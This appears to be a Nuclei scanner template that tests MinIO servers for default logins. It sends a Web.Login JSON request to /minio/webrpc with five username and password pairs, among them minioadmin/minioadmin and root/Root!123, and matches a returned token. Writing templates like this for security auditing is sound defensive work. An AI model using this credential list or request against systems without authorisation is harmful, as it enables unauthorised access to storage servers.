id: minio-default-login

info:
  name: Minio Default Login
  author: minio
  severity: high
  tags: default-login,minio

http:
  - raw:
      - |
        POST /minio/webrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"}

    payloads:
      username:
        - minioadmin
        - admin
        - admin
        - root
        - admin
      password:
        - minioadmin
        - minioadmin
        - admin123
        - Root!123
        - Huawei12#$
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Content-Type: application/json"
        part: header

      - type: word
        words:
          - 'uiVersion'
          - 'token'
        part: body
        condition: and

      - type: status
        status:
          - 200
